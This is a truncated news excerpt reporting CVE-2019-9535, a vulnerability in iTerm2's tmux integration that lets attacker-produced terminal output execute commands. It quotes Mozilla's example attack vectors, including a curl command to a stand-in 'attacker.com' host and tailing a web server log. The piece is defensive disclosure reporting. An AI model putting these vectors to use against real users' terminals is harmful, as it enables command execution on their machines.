A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system.
“An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained.
“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.”
About the vulnerability (CVE-2019-9535)
The vulnerability is in the tmux integration feature of iTerm2 and has been present for at least seven years.
It was dis ..
Support the originator by clicking the read the rest link below.
